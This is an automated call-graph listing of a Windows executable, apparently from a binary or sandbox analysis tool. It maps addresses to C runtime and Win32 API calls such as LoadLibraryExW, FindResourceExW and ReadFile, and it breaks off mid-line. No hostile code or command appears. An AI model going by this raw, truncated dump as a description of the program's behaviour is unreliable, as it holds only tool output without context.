103780->103795 103783->103764 103784->103770 103786->103765 103787->103769 103788->103780 103790 a32d5e RtlFreeHeap 103789->103790 103794 a32d87 _free 103789->103794 103791 a32d73 103790->103791 103790->103794 103796 a38b28 58 API calls __getptd_noexit 103791->103796 103793 a32d79 GetLastError 103793->103794 103794->103780 103795->103769 103796->103793 103797->103742 103798->103743 103799->103746 103803 a39d75 LeaveCriticalSection 103800->103803 103802 a32c87 103802->103733 103803->103802 103804 a37c56 103805 a37c62 __initptd 103804->103805 103841 a39e08 GetStartupInfoW 103805->103841 103807 a37c67 103843 a38b7c GetProcessHeap 103807->103843 103809 a37cbf 103810 a37cca 103809->103810 103926 a37da6 58 API calls 3 library calls 103809->103926 103844 a39ae6 103810->103844 103813 a37cd0 103814 a37cdb __RTC_Initialize 103813->103814 103927 a37da6 58 API calls 3 library calls 103813->103927 103865 a3d5d2 103814->103865 103817 a37cea 103818 a37cf6 GetCommandLineW 103817->103818 103928 a37da6 58 API calls 3 library calls 103817->103928 103884 a44f23 GetEnvironmentStringsW 103818->103884 103821 a37cf5 103821->103818 103824 a37d10 103825 a37d1b 103824->103825 103929 a330b5 58 API calls 3 library calls 103824->103929 103894 a44d58 103825->103894 103828 a37d21 103829 a37d2c 103828->103829 103930 a330b5 58 API calls 3 library calls 103828->103930 103908 a330ef 103829->103908 103832 a37d34 103833 a37d3f __wwincmdln 103832->103833 103931 a330b5 58 API calls 3 library calls 103832->103931 103914 a147d0 103833->103914 103836 a37d53 103837 a37d62 103836->103837 103932 a33358 58 API calls _doexit 103836->103932 103933 a330e0 58 API calls _doexit 103837->103933 103840 a37d67 __initptd 103842 a39e1e 103841->103842 103842->103807 103843->103809 103934 a33187 36 API calls 2 library calls 103844->103934 103846 a39aeb 103935 a39d3c InitializeCriticalSectionAndSpinCount __mtinitlocknum 103846->103935 103848 a39af0 103849 a39af4 103848->103849 103937 a39d8a TlsAlloc 103848->103937 103936 a39b5c 61 API calls 2 library calls 103849->103936 103852 a39af9 103852->103813 103853 a39b06 103853->103849 103854 a39b11 103853->103854 103938 a387d5 103854->103938 103857 a39b53 103946 a39b5c 61 API calls 2 library calls 103857->103946 103860 a39b32 103860->103857 103862 a39b38 103860->103862 103861 a39b58 103861->103813 103945 a39a33 58 API calls 3 library calls 103862->103945 103864 a39b40 GetCurrentThreadId 103864->103813 103866 a3d5de __initptd 103865->103866 103867 a39c0b __lock 58 API calls 103866->103867 103868 a3d5e5 103867->103868 103869 a387d5 __calloc_crt 58 API calls 103868->103869 103871 a3d5f6 103869->103871 103870 a3d661 GetStartupInfoW 103878 a3d676 103870->103878 103879 a3d7a5 103870->103879 103871->103870 103872 a3d601 __initptd @_EH4_CallFilterFunc@8 103871->103872 103872->103817 103873 a3d86d 103960 a3d87d LeaveCriticalSection _doexit 103873->103960 103875 a387d5 __calloc_crt 58 API calls 103875->103878 103876 a3d7f2 GetStdHandle 103876->103879 103877 a3d805 GetFileType 103877->103879 103878->103875 103878->103879 103880 a3d6c4 103878->103880 103879->103873 103879->103876 103879->103877 103959 a39e2b InitializeCriticalSectionAndSpinCount 103879->103959 103880->103879 103881 a3d6f8 GetFileType 103880->103881 103958 a39e2b InitializeCriticalSectionAndSpinCount 103880->103958 103881->103880 103885 a44f34 103884->103885 103886 a37d06 103884->103886 103961 a3881d 58 API calls 2 library calls 103885->103961 103890 a44b1b GetModuleFileNameW 103886->103890 103888 a44f70 FreeEnvironmentStringsW 103888->103886 103889 a44f5a _memmove 103889->103888 103891 a44b4f _wparse_cmdline 103890->103891 103893 a44b8f _wparse_cmdline 103891->103893 103962 a3881d 58 API calls 2 library calls 103891->103962 103893->103824 103895 a44d71 __wsetenvp 103894->103895 103896 a44d69 103894->103896 103897 a387d5 __calloc_crt 58 API calls 103895->103897 103896->103828 103901 a44d9a __wsetenvp 103897->103901 103898 a44df1 103899 a32d55 _free 58 API calls 103898->103899 103899->103896 103900 a387d5 __calloc_crt 58 API calls 103900->103901 103901->103896 103901->103898 103901->103900 103902 a44e16 103901->103902 103905 a44e2d 103901->103905 103963 a44607 58 API calls 2 library calls 103901->103963 103903 a32d55 _free 58 API calls 103902->103903 103903->103896 103964 a38dc6 IsProcessorFeaturePresent 103905->103964 103907 a44e39 103907->103828 103909 a330fb __IsNonwritableInCurrentImage 103908->103909 103987 a3a4d1 103909->103987 103911 a33119 __initterm_e 103912 a32d40 __cinit 67 API calls 103911->103912 103913 a33138 _doexit __IsNonwritableInCurrentImage 103911->103913 103912->103913 103913->103832 103915 a147ea 103914->103915 103925 a14889 103914->103925 103916 a14824 IsThemeActive 103915->103916 103990 a3336c 103916->103990 103920 a14850 104002 a148fd SystemParametersInfoW SystemParametersInfoW 103920->104002 103922 a1485c 104003 a13b3a 103922->104003 103924 a14864 SystemParametersInfoW 103924->103925 103925->103836 103926->103810 103927->103814 103928->103821 103932->103837 103933->103840 103934->103846 103935->103848 103936->103852 103937->103853 103940 a387dc 103938->103940 103941 a38817 103940->103941 103943 a387fa 103940->103943 103947 a451f6 103940->103947 103941->103857 103944 a39de6 TlsSetValue 103941->103944 103943->103940 103943->103941 103955 a3a132 Sleep 103943->103955 103944->103860 103945->103864 103946->103861 103948 a45201 103947->103948 103951 a4521c 103947->103951 103949 a4520d 103948->103949 103948->103951 103956 a38b28 58 API calls __getptd_noexit 103949->103956 103952 a4522c HeapAlloc 103951->103952 103953 a45212 103951->103953 103957 a333a1 DecodePointer 103951->103957 103952->103951 103952->103953 103953->103940 103955->103943 103956->103953 103957->103951 103958->103880 103959->103879 103960->103872 103961->103889 103962->103893 103963->103901 103965 a38dd1 103964->103965 103970 a38c59 103965->103970 103969 a38dec 103969->103907 103971 a38c73 _memset __call_reportfault 103970->103971 103972 a38c93 IsDebuggerPresent 103971->103972 103978 a3a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 103972->103978 103974 a38d57 __call_reportfault 103979 a3c5f6 103974->103979 103976 a38d7a 103977 a3a140 GetCurrentProcess TerminateProcess 103976->103977 103977->103969 103978->103974 103980 a3c600 IsProcessorFeaturePresent 103979->103980 103981 a3c5fe 103979->103981 103983 a4590a 103980->103983 103981->103976 103986 a458b9 5 API calls 2 library calls 103983->103986 103985 a459ed 103985->103976 103986->103985 103988 a3a4d4 EncodePointer 103987->103988 103988->103988 103989 a3a4ee 103988->103989 103989->103911 103991 a39c0b __lock 58 API calls 103990->103991 103992 a33377 DecodePointer EncodePointer 103991->103992 104055 a39d75 LeaveCriticalSection 103992->104055 103994 a14849 103995 a333d4 103994->103995 103996 a333f8 103995->103996 103997 a333de 103995->103997 103996->103920 103997->103996 104056 a38b28 58 API calls __getptd_noexit 103997->104056 103999 a333e8 104057 a38db6 9 API calls __wctomb_s_l 103999->104057 104001 a333f3 104001->103920 104002->103922 104004 a13b47 __write_nolock 104003->104004 104005 a17667 59 API calls 104004->104005 104006 a13b51 GetCurrentDirectoryW 104005->104006 104058 a13766 104006->104058 104008 a13b7a IsDebuggerPresent 104009 a4d272 MessageBoxA 104008->104009 104010 a13b88 104008->104010 104011 a4d28c 104009->104011 104010->104011 104012 a13ba5 104010->104012 104042 a13c61 104010->104042 104257 a17213 59 API calls Mailbox 104011->104257 104139 a17285 104012->104139 104013 a13c68 SetCurrentDirectoryW 104018 a13c75 Mailbox 104013->104018 104017 a13bc3 GetFullPathNameW 104020 a17bcc 59 API calls 104017->104020 104018->103924 104019 a4d29c 104022 a4d2b2 SetCurrentDirectoryW 104019->104022 104021 a13bfe 104020->104021 104155 a2092d 104021->104155 104022->104018 104042->104013 104055->103994 104056->103999 104057->104001 104059 a17667 59 API calls 104058->104059 104060 a1377c 104059->104060 104270 a13d31 104060->104270 104062 a1379a 104063 a14706 61 API calls 104062->104063 104064 a137ae 104063->104064 104065 a17de1 59 API calls 104064->104065 104066 a137bb 104065->104066 104284 a14ddd 104066->104284 104069 a4d173 104351 a7955b 104069->104351 104070 a137dc Mailbox 104073 a18047 59 API calls 104070->104073 104076 a137ef 104073->104076 104074 a4d192 104075 a32d55 _free 58 API calls 104074->104075 104078 a4d19f 104075->104078 104308 a1928a 104076->104308 104080 a14e4a 84 API calls 104078->104080 104082 a4d1a8 104080->104082 104086 a13ed0 59 API calls 104082->104086 104083 a17de1 59 API calls 104084 a13808 104083->104084 104311 a184c0 104084->104311 104088 a4d1c3 104086->104088 104087 a1381a Mailbox 104089 a17de1 59 API calls 104087->104089 104090 a13ed0 59 API calls 104088->104090 104091 a13840 104089->104091 104092 a4d1df 104090->104092 104093 a184c0 69 API calls 104091->104093 104094 a14706 61 API calls 104092->104094 104096 a1384f Mailbox 104093->104096 104095 a4d204 104094->104095 104097 a13ed0 59 API calls 104095->104097 104099 a17667 59 API calls 104096->104099 104098 a4d210 104097->104098 104100 a18047 59 API calls 104098->104100 104101 a1386d 104099->104101 104102 a4d21e 104100->104102 104315 a13ed0 104101->104315 104104 a13ed0 59 API calls 104102->104104 104106 a4d22d 104104->104106 104112 a18047 59 API calls 104106->104112 104108 a13887 104108->104082 104109 a13891 104108->104109 104110 a32efd _W_store_winword 60 API calls 104109->104110 104111 a1389c 104110->104111 104111->104088 104113 a138a6 104111->104113 104114 a4d24f 104112->104114 104115 a32efd _W_store_winword 60 API calls 104113->104115 104117 a13ed0 59 API calls 104114->104117 104116 a138b1 104115->104116 104116->104092 104119 a138bb 104116->104119 104118 a4d25c 104117->104118 104118->104118 104120 a32efd _W_store_winword 60 API calls 104119->104120 104121 a138c6 104120->104121 104121->104106 104122 a13907 104121->104122 104124 a13ed0 59 API calls 104121->104124 104122->104106 104123 a13914 104122->104123 104331 a192ce 104123->104331 104125 a138ea 104124->104125 104127 a18047 59 API calls 104125->104127 104130 a138f8 104127->104130 104132 a13ed0 59 API calls 104130->104132 104132->104122 104134 a1928a 59 API calls 104136 a1394f 104134->104136 104135 a18ee0 60 API calls 104135->104136 104136->104134 104136->104135 104137 a13ed0 59 API calls 104136->104137 104138 a13995 Mailbox 104136->104138 104137->104136 104138->104008 104140 a17292 __write_nolock 104139->104140 104141 a4ea22 _memset 104140->104141 104142 a172ab 104140->104142 104144 a4ea3e GetOpenFileNameW 104141->104144 105216 a14750 104142->105216 104146 a4ea8d 104144->104146 104148 a17bcc 59 API calls 104146->104148 104150 a4eaa2 104148->104150 104150->104150 104152 a172c9 105244 a1686a 104152->105244 104156 a2093a __write_nolock 104155->104156 105566 a16d80 104156->105566 104158 a2093f 104159 a13c14 104158->104159 105577 a2119e 89 API calls 104158->105577 104159->104019 104257->104019 104271 a13d3e __write_nolock 104270->104271 104272 a17bcc 59 API calls 104271->104272 104282 a13ea4 Mailbox 104271->104282 104274 a13d70 104272->104274 104275 a13da6 Mailbox 104274->104275 104392 a179f2 104274->104392 104276 a13e77 104275->104276 104278 a17de1 59 API calls 104275->104278 104275->104282 104283 a179f2 59 API calls 104275->104283 104395 a13f74 104275->104395 104277 a17de1 59 API calls 104276->104277 104276->104282 104279 a13e98 104277->104279 104278->104275 104280 a13f74 59 API calls 104279->104280 104280->104282 104282->104062 104283->104275 104401 a14bb5 104284->104401 104289 a4d8e6 104292 a14e4a 84 API calls 104289->104292 104290 a14e08 LoadLibraryExW 104411 a14b6a 104290->104411 104294 a4d8ed 104292->104294 104296 a14b6a 3 API calls 104294->104296 104298 a4d8f5 104296->104298 104297 a14e2f 104297->104298 104299 a14e3b 104297->104299 104437 a14f0b 104298->104437 104300 a14e4a 84 API calls 104299->104300 104302 a137d4 104300->104302 104302->104069 104302->104070 104305 a4d91c 104445 a14ec7 104305->104445 104307 a4d929 104309 a30db6 Mailbox 59 API calls 104308->104309 104310 a137fb 104309->104310 104310->104083 104312 a184cb 104311->104312 104314 a184f2 104312->104314 104875 a189b3 69 API calls Mailbox 104312->104875 104314->104087 104316 a13ef3 104315->104316 104317 a13eda 104315->104317 104319 a17bcc 59 API calls 104316->104319 104318 a18047 59 API calls 104317->104318 104320 a13879 104318->104320 104319->104320 104321 a32efd 104320->104321 104322 a32f09 104321->104322 104323 a32f7e 104321->104323 104330 a32f2e 104322->104330 104876 a38b28 58 API calls __getptd_noexit 104322->104876 104878 a32f90 60 API calls 4 library calls 104323->104878 104326 a32f8b 104326->104108 104327 a32f15 104877 a38db6 9 API calls __wctomb_s_l 104327->104877 104329 a32f20 104329->104108 104330->104108 104332 a192d6 104331->104332 104333 a30db6 Mailbox 59 API calls 104332->104333 104334 a192e4 104333->104334 104335 a13924 104334->104335 104879 a191fc 59 API calls Mailbox 104334->104879 104337 a19050 104335->104337 104880 a19160 104337->104880 104339 a30db6 Mailbox 59 API calls 104340 a13932 104339->104340 104342 a18ee0 104340->104342 104341 a1905f 104341->104339 104341->104340 104343 a4f17c 104342->104343 104345 a18ef7 104342->104345 104343->104345 104890 a18bdb 59 API calls Mailbox 104343->104890 104346 a19040 104345->104346 104347 a18ff8 104345->104347 104350 a18fff 104345->104350 104889 a19d3c 60 API calls Mailbox 104346->104889 104348 a30db6 Mailbox 59 API calls 104347->104348 104348->104350 104350->104136 104352 a14ee5 85 API calls 104351->104352 104353 a795ca 104352->104353 104891 a79734 104353->104891 104356 a14f0b 74 API calls 104357 a795f7 104356->104357 104358 a14f0b 74 API calls 104357->104358 104359 a79607 104358->104359 104360 a14f0b 74 API calls 104359->104360 104361 a79622 104360->104361 104362 a14f0b 74 API calls 104361->104362 104363 a7963d 104362->104363 104364 a14ee5 85 API calls 104363->104364 104365 a79654 104364->104365 104366 a3571c __crtGetStringTypeA_stat 58 API calls 104365->104366 104367 a7965b 104366->104367 104368 a3571c __crtGetStringTypeA_stat 58 API calls 104367->104368 104369 a79665 104368->104369 104370 a14f0b 74 API calls 104369->104370 104371 a79679 104370->104371 104372 a79109 GetSystemTimeAsFileTime 104371->104372 104373 a7968c 104372->104373 104374 a796b6 104373->104374 104375 a796a1 104373->104375 104377 a796bc 104374->104377 104378 a7971b 104374->104378 104376 a32d55 _free 58 API calls 104375->104376 104379 a796a7 104376->104379 104897 a78b06 104377->104897 104381 a32d55 _free 58 API calls 104378->104381 104382 a32d55 _free 58 API calls 104379->104382 104384 a4d186 104381->104384 104382->104384 104384->104074 104386 a14e4a 104384->104386 104385 a32d55 _free 58 API calls 104385->104384 104387 a14e54 104386->104387 104388 a14e5b 104386->104388 104389 a353a6 __fcloseall 83 API calls 104387->104389 104390 a14e7b FreeLibrary 104388->104390 104391 a14e6a 104388->104391 104389->104388 104390->104391 104391->104074 104393 a17e4f 59 API calls 104392->104393 104394 a179fd 104393->104394 104394->104274 104396 a13f82 104395->104396 104400 a13fa4 _memmove 104395->104400 104399 a30db6 Mailbox 59 API calls 104396->104399 104397 a30db6 Mailbox 59 API calls 104398 a13fb8 104397->104398 104398->104275 104399->104400 104400->104397 104450 a14c03 104401->104450 104404 a14bdc 104405 a14bf5 104404->104405 104406 a14bec FreeLibrary 104404->104406 104408 a3525b 104405->104408 104406->104405 104407 a14c03 2 API calls 104407->104404 104454 a35270 104408->104454 104410 a14dfc 104410->104289 104410->104290 104612 a14c36 104411->104612 104414 a14ba1 FreeLibrary 104415 a14baa 104414->104415 104418 a14c70 104415->104418 104416 a14c36 2 API calls 104417 a14b8f 104416->104417 104417->104414 104417->104415 104419 a30db6 Mailbox 59 API calls 104418->104419 104420 a14c85 104419->104420 104616 a1522e 104420->104616 104422 a14c91 _memmove 104423 a14ccc 104422->104423 104425 a14dc1 104422->104425 104426 a14d89 104422->104426 104424 a14ec7 69 API calls 104423->104424 104433 a14cd5 104424->104433 104630 a7991b 95 API calls 104425->104630 104619 a14e89 CreateStreamOnHGlobal 104426->104619 104429 a14f0b 74 API calls 104429->104433 104431 a14d69 104431->104297 104432 a4d8a7 104434 a14ee5 85 API calls 104432->104434 104433->104429 104433->104431 104433->104432 104625 a14ee5 104433->104625 104435 a4d8bb 104434->104435 104436 a14f0b 74 API calls 104435->104436 104436->104431 104438 a4d9cd 104437->104438 104439 a14f1d 104437->104439 104654 a355e2 104439->104654 104442 a79109 104852 a78f5f 104442->104852 104444 a7911f 104444->104305 104446 a14ed6 104445->104446 104449 a4d990 104445->104449 104857 a35c60 104446->104857 104448 a14ede 104448->104307 104451 a14bd0 104450->104451 104452 a14c0c LoadLibraryA 104450->104452 104451->104404 104451->104407 104452->104451 104453 a14c1d GetProcAddress 104452->104453 104453->104451 104457 a3527c __initptd 104454->104457 104455 a3528f 104503 a38b28 58 API calls __getptd_noexit 104455->104503 104457->104455 104458 a352c0 104457->104458 104473 a404e8 104458->104473 104459 a35294 104504 a38db6 9 API calls __wctomb_s_l 104459->104504 104462 a352c5 104463 a352db 104462->104463 104464 a352ce 104462->104464 104466 a35305 104463->104466 104467 a352e5 104463->104467 104505 a38b28 58 API calls __getptd_noexit 104464->104505 104488 a40607 104466->104488 104506 a38b28 58 API calls __getptd_noexit 104467->104506 104470 a3529f __initptd @_EH4_CallFilterFunc@8 104470->104410 104474 a404f4 __initptd 104473->104474 104475 a39c0b __lock 58 API calls 104474->104475 104486 a40502 104475->104486 104476 a40576 104508 a405fe 104476->104508 104477 a4057d 104513 a3881d 58 API calls 2 library calls 104477->104513 104480 a40584 104480->104476 104514 a39e2b InitializeCriticalSectionAndSpinCount 104480->104514 104481 a405f3 __initptd 104481->104462 104483 a39c93 __mtinitlocknum 58 API calls 104483->104486 104485 a405aa EnterCriticalSection 104485->104476 104486->104476 104486->104477 104486->104483 104511 a36c50 59 API calls __lock 104486->104511 104512 a36cba LeaveCriticalSection LeaveCriticalSection _doexit 104486->104512 104496 a40627 __wopenfile 104488->104496 104489 a40641 104519 a38b28 58 API calls __getptd_noexit 104489->104519 104491 a40646 104520 a38db6 9 API calls __wctomb_s_l 104491->104520 104493 a4085f 104516 a485a1 104493->104516 104494 a35310 104507 a35332 LeaveCriticalSection LeaveCriticalSection _fseek 104494->104507 104496->104489 104502 a407fc 104496->104502 104521 a337cb 60 API calls 3 library calls 104496->104521 104498 a407f5 104498->104502 104522 a337cb 60 API calls 3 library calls 104498->104522 104500 a40814 104500->104502 104523 a337cb 60 API calls 3 library calls 104500->104523 104502->104489 104502->104493 104503->104459 104504->104470 104505->104470 104506->104470 104507->104470 104515 a39d75 LeaveCriticalSection 104508->104515 104510 a40605 104510->104481 104511->104486 104512->104486 104513->104480 104514->104485 104515->104510 104524 a47d85 104516->104524 104518 a485ba 104518->104494 104519->104491 104520->104494 104521->104498 104522->104500 104523->104502 104525 a47d91 __initptd 104524->104525 104526 a47da7 104525->104526 104529 a47ddd 104525->104529 104609 a38b28 58 API calls __getptd_noexit 104526->104609 104528 a47dac 104610 a38db6 9 API calls __wctomb_s_l 104528->104610 104535 a47e4e 104529->104535 104532 a47df9 104611 a47e22 LeaveCriticalSection __unlock_fhandle 104532->104611 104534 a47db6 __initptd 104534->104518 104536 a47e6e 104535->104536 104537 a344ea __wsopen_nolock 58 API calls 104536->104537 104541 a47e8a 104537->104541 104538 a38dc6 __invoke_watson 8 API calls 104540 a485a0 104538->104540 104539 a47ee7 104549 a47fa5 104539->104549 104557 a47f83 104539->104557 104542 a47d85 __wsopen_helper 103 API calls 104540->104542 104541->104539 104543 a47ec4 104541->104543 104558 a47fc1 104541->104558 104544 a485ba 104542->104544 104545 a38af4 __wsopen_nolock 58 API calls 104543->104545 104544->104532 104546 a47ec9 104545->104546 104547 a38b28 __recalloc 58 API calls 104546->104547 104548 a47ed6 104547->104548 104550 a38db6 __wctomb_s_l 9 API calls 104548->104550 104551 a38af4 __wsopen_nolock 58 API calls 104549->104551 104552 a47ee0 104550->104552 104553 a47faa 104551->104553 104552->104532 104554 a38b28 __recalloc 58 API calls 104553->104554 104555 a47fb7 104554->104555 104556 a38db6 __wctomb_s_l 9 API calls 104555->104556 104556->104558 104559 a3d294 __alloc_osfhnd 61 API calls 104557->104559 104558->104538 104560 a48051 104559->104560 104561 a4807e 104560->104561 104562 a4805b 104560->104562 104564 a47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104561->104564 104563 a38af4 __wsopen_nolock 58 API calls 104562->104563 104565 a48060 104563->104565 104572 a480a0 104564->104572 104567 a38b28 __recalloc 58 API calls 104565->104567 104566 a4811e GetFileType 104570 a48129 GetLastError 104566->104570 104571 a4816b 104566->104571 104569 a4806a 104567->104569 104568 a480ec GetLastError 104573 a38b07 __dosmaperr 58 API calls 104568->104573 104574 a38b28 __recalloc 58 API calls 104569->104574 104575 a38b07 __dosmaperr 58 API calls 104570->104575 104580 a3d52a __set_osfhnd 59 API calls 104571->104580 104572->104566 104572->104568 104576 a47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104572->104576 104577 a48111 104573->104577 104574->104552 104578 a48150 CloseHandle 104575->104578 104579 a480e1 104576->104579 104583 a38b28 __recalloc 58 API calls 104577->104583 104578->104577 104581 a4815e 104578->104581 104579->104566 104579->104568 104586 a48189 104580->104586 104582 a38b28 __recalloc 58 API calls 104581->104582 104584 a48163 104582->104584 104583->104558 104584->104577 104585 a48344 104585->104558 104588 a48517 CloseHandle 104585->104588 104586->104585 104587 a418c1 __lseeki64_nolock 60 API calls 104586->104587 104606 a4820a 104586->104606 104589 a481f3 104587->104589 104590 a47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104588->104590 104593 a38af4 __wsopen_nolock 58 API calls 104589->104593 104589->104606 104592 a4853e 104590->104592 104591 a40e5b 70 API calls __read_nolock 104591->104606 104594 a48546 GetLastError 104592->104594 104595 a48572 104592->104595 104593->104606 104596 a38b07 __dosmaperr 58 API calls 104594->104596 104595->104558 104597 a48552 104596->104597 104600 a3d43d __free_osfhnd 59 API calls 104597->104600 104598 a40add __close_nolock 61 API calls 104598->104606 104599 a4823c 104601 a497a2 __chsize_nolock 82 API calls 104599->104601 104599->104606 104600->104595 104601->104599 104602 a3d886 __write 78 API calls 104602->104606 104603 a483c1 104605 a40add __close_nolock 61 API calls 104603->104605 104604 a418c1 60 API calls __lseeki64_nolock 104604->104606 104607 a483c8 104605->104607 104606->104585 104606->104591 104606->104598 104606->104599 104606->104602 104606->104603 104606->104604 104608 a38b28 __recalloc 58 API calls 104607->104608 104608->104558 104609->104528 104610->104534 104611->104534 104613 a14b83 104612->104613 104614 a14c3f LoadLibraryA 104612->104614 104613->104416 104613->104417 104614->104613 104615 a14c50 GetProcAddress 104614->104615 104615->104613 104617 a30db6 Mailbox 59 API calls 104616->104617 104618 a15240 104617->104618 104618->104422 104620 a14ea3 FindResourceExW 104619->104620 104624 a14ec0 104619->104624 104621 a4d933 LoadResource 104620->104621 104620->104624 104622 a4d948 SizeofResource 104621->104622 104621->104624 104623 a4d95c LockResource 104622->104623 104622->104624 104623->104624 104624->104423 104626 a14ef4 104625->104626 104627 a4d9ab 104625->104627 104631 a3584d 104626->104631 104629 a14f02 104629->104433 104630->104423 104634 a35859 __initptd 104631->104634 104632 a3586b 104644 a38b28 58 API calls __getptd_noexit 104632->104644 104633 a35891 104646 a36c11 104633->104646 104634->104632 104634->104633 104637 a35870 104645 a38db6 9 API calls __wctomb_s_l 104637->104645 104639 a35897 104652 a357be 83 API calls 5 library calls 104639->104652 104641 a358a6 104653 a358c8 LeaveCriticalSection LeaveCriticalSection _fseek 104641->104653 104643 a3587b __initptd 104643->104629 104644->104637 104645->104643 104647 a36c43 EnterCriticalSection 104646->104647 104648 a36c21 104646->104648 104650 a36c39 104647->104650 104648->104647 104649 a36c29 104648->104649 104651 a39c0b __lock 58 API calls 104649->104651 104650->104639 104651->104650 104652->104641 104653->104643 104657 a355fd 104654->104657 104656 a14f2e 104656->104442 104658 a35609 __initptd 104657->104658 104659 a3561f _memset 104658->104659 104660 a3564c 104658->104660 104662 a35644 __initptd 104658->104662 104684 a38b28 58 API calls __getptd_noexit 104659->104684 104661 a36c11 __lock_file 59 API calls 104660->104661 104663 a35652 104661->104663 104662->104656 104670 a3541d 104663->104670 104666 a35639 104685 a38db6 9 API calls __wctomb_s_l 104666->104685 104671 a35453 104670->104671 104674 a35438 _memset 104670->104674 104686 a35686 LeaveCriticalSection LeaveCriticalSection _fseek 104671->104686 104672 a35443 104782 a38b28 58 API calls __getptd_noexit 104672->104782 104674->104671 104674->104672 104676 a35493 104674->104676 104676->104671 104680 a355a4 _memset 104676->104680 104687 a346e6 104676->104687 104694 a40e5b 104676->104694 104762 a40ba7 104676->104762 104784 a40cc8 58 API calls 4 library calls 104676->104784 104785 a38b28 58 API calls __getptd_noexit 104680->104785 104683 a35448 104783 a38db6 9 API calls __wctomb_s_l 104683->104783 104684->104666 104685->104662 104686->104662 104688 a346f0 104687->104688 104689 a34705 104687->104689 104786 a38b28 58 API calls __getptd_noexit 104688->104786 104689->104676 104691 a346f5 104787 a38db6 9 API calls __wctomb_s_l 104691->104787 104693 a34700 104693->104676 104695 a40e93 104694->104695 104696 a40e7c 104694->104696 104698 a415cb 104695->104698 104702 a40ecd 104695->104702 104797 a38af4 58 API calls __getptd_noexit 104696->104797 104813 a38af4 58 API calls __getptd_noexit 104698->104813 104699 a40e81 104798 a38b28 58 API calls __getptd_noexit 104699->104798 104704 a40ed5 104702->104704 104712 a40eec 104702->104712 104703 a415d0 104814 a38b28 58 API calls __getptd_noexit 104703->104814 104799 a38af4 58 API calls __getptd_noexit 104704->104799 104707 a40ee1 104815 a38db6 9 API calls __wctomb_s_l 104707->104815 104708 a40eda 104800 a38b28 58 API calls __getptd_noexit 104708->104800 104710 a40f01 104801 a38af4 58 API calls __getptd_noexit 104710->104801 104712->104710 104713 a40f1b 104712->104713 104715 a40f39 104712->104715 104743 a40e88 104712->104743 104713->104710 104718 a40f26 104713->104718 104802 a3881d 58 API calls 2 library calls 104715->104802 104788 a45c6b 104718->104788 104719 a40f49 104721 a40f51 104719->104721 104722 a40f6c 104719->104722 104720 a4103a 104724 a410b3 ReadFile 104720->104724 104729 a41050 GetConsoleMode 104720->104729 104803 a38b28 58 API calls __getptd_noexit 104721->104803 104805 a418c1 60 API calls 3 library calls 104722->104805 104727 a410d5 104724->104727 104728 a41593 GetLastError 104724->104728 104726 a40f56 104804 a38af4 58 API calls __getptd_noexit 104726->104804 104727->104728 104735 a410a5 104727->104735 104731 a41093 104728->104731 104732 a415a0 104728->104732 104733 a41064 104729->104733 104734 a410b0 104729->104734 104744 a41099 104731->104744 104806 a38b07 58 API calls 3 library calls 104731->104806 104811 a38b28 58 API calls __getptd_noexit 104732->104811 104733->104734 104737 a4106a ReadConsoleW 104733->104737 104734->104724 104735->104744 104745 a4110a 104735->104745 104748 a41377 104735->104748 104737->104735 104739 a4108d GetLastError 104737->104739 104738 a415a5 104812 a38af4 58 API calls __getptd_noexit 104738->104812 104739->104731 104742 a32d55 _free 58 API calls 104742->104743 104743->104676 104744->104742 104744->104743 104747 a41176 ReadFile 104745->104747 104753 a411f7 104745->104753 104750 a41197 GetLastError 104747->104750 104760 a411a1 104747->104760 104748->104744 104749 a4147d ReadFile 104748->104749 104755 a414a0 GetLastError 104749->104755 104761 a414ae 104749->104761 104750->104760 104751 a412b4 104756 a41264 MultiByteToWideChar 104751->104756 104809 a418c1 60 API calls 3 library calls 104751->104809 104752 a412a4 104808 a38b28 58 API calls __getptd_noexit 104752->104808 104753->104744 104753->104751 104753->104752 104753->104756 104755->104761 104756->104739 104756->104744 104760->104745 104807 a418c1 60 API calls 3 library calls 104760->104807 104761->104748 104810 a418c1 60 API calls 3 library calls 104761->104810 104763 a40bb2 104762->104763 104767 a40bc7 104762->104767 104849 a38b28 58 API calls __getptd_noexit 104763->104849 104764 a40bc2 104764->104676 104766 a40bb7 104850 a38db6 9 API calls __wctomb_s_l 104766->104850 104767->104764 104769 a40bfc 104767->104769 104851 a45fe4 58 API calls __malloc_crt 104767->104851 104771 a346e6 __stbuf 58 API calls 104769->104771 104772 a40c10 104771->104772 104816 a40d47 104772->104816 104774 a40c17 104774->104764 104775 a346e6 __stbuf 58 API calls 104774->104775 104776 a40c3a 104775->104776 104776->104764 104777 a346e6 __stbuf 58 API calls 104776->104777 104778 a40c46 104777->104778 104778->104764 104779 a346e6 __stbuf 58 API calls 104778->104779 104780 a40c53 104779->104780 104781 a346e6 __stbuf 58 API calls 104780->104781 104781->104764 104782->104683 104783->104671 104784->104676 104785->104683 104786->104691 104787->104693 104789 a45c76 104788->104789 104790 a45c83 104788->104790 104791 a38b28 __recalloc 58 API calls 104789->104791 104792 a45c8f 104790->104792 104793 a38b28 __recalloc 58 API calls 104790->104793 104794 a45c7b 104791->104794 104792->104720 104795 a45cb0 104793->104795 104794->104720 104796 a38db6 __wctomb_s_l 9 API calls 104795->104796 104796->104794 104797->104699 104798->104743 104799->104708 104800->104707 104801->104708 104802->104719 104803->104726 104804->104743 104805->104718 104806->104744 104807->104760 104808->104744 104809->104756 104810->104761 104811->104738 104812->104744 104813->104703 104814->104707 104815->104743 104817 a40d53 __initptd 104816->104817 104818 a40d77 104817->104818 104819 a40d60 104817->104819 104821 a40e3b 104818->104821 104824 a40d8b 104818->104824 104820 a38af4 __wsopen_nolock 58 API calls 104819->104820 104823 a40d65 104820->104823 104822 a38af4 __wsopen_nolock 58 API calls 104821->104822 104825 a40dae 104822->104825 104826 a38b28 __recalloc 58 API calls 104823->104826 104827 a40db6 104824->104827 104828 a40da9 104824->104828 104834 a38b28 __recalloc 58 API calls 104825->104834 104838 a40d6c __initptd 104826->104838 104830 a40dc3 104827->104830 104831 a40dd8 104827->104831 104829 a38af4 __wsopen_nolock 58 API calls 104828->104829 104829->104825 104832 a38af4 __wsopen_nolock 58 API calls 104830->104832 104833 a3d206 ___lock_fhandle 59 API calls 104831->104833 104835 a40dc8 104832->104835 104836 a40dde 104833->104836 104837 a40dd0 104834->104837 104839 a38b28 __recalloc 58 API calls 104835->104839 104840 a40e04 104836->104840 104841 a40df1 104836->104841 104843 a38db6 __wctomb_s_l 9 API calls 